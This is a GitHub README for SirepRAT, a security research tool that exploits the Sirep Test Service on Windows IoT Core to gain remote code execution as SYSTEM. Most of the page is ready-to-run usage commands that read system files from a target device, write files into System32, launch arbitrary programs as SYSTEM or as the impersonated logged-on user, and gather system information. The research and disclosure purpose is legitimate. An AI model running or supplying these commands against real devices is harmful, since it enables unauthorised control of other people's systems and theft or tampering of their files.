Skip to content

Latest commit

 

History

History
73 lines (50 loc) · 2.77 KB

README.md

File metadata and controls

73 lines (50 loc) · 2.77 KB

SirepRAT

SirepRAT - RCE as SYSTEM on Windows IoT Core

SirepRAT Features full RAT capabilities without the need of writing a real RAT malware on target.

Context

The method is exploiting the Sirep Test Service that’s built in and running on the official images offered at Microsoft’s site. This service is the client part of the HLK setup one may build in order to perform driver/hardware tests on the IoT device. It serves the Sirep/WPCon/TShell protocol.

We broke down the Sirep/WPCon protocol and demonstrated how this protocol exposes a remote command interface for attackers, that include RAT abilities such as get/put arbitrary files on arbitrary locations and obtain system information.

Based on the findings we have extracted from this research about the service and protocol, we built a simple python tool that allows exploiting them using the different supported commands. We called it SirepRAT.

It features an easy and intuitive user interface for sending commands to a Windows IoT Core target. It works on any cable-connected device running Windows IoT Core with an official Microsoft image.

Slides and White Paper

Slides and research White Paper are in the docs folder

Setup

pip install -r requirements.txt

Usage

Download File

python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v

Upload File

python SirepRAT.py 192.168.3.17 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"

Run Arbitrary Program

python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"

With arguments, impersonated as the currently logged on user:

python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"

(Try to run it without the as_logged_on_user flag to demonstrate the SYSTEM execution capability)

Get System Information

python SirepRAT.py 192.168.3.17 GetSystemInformationFromDevice

Get File Information

python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"

See help for full details:

python SirepRAT.py --help

Author

Dor Azouri (@bemikre)

Contributors

movatica (@movatica) - porting to python 3! (at the finish line of 2020)

License

BSD 3 - clause "New" or "Revised" License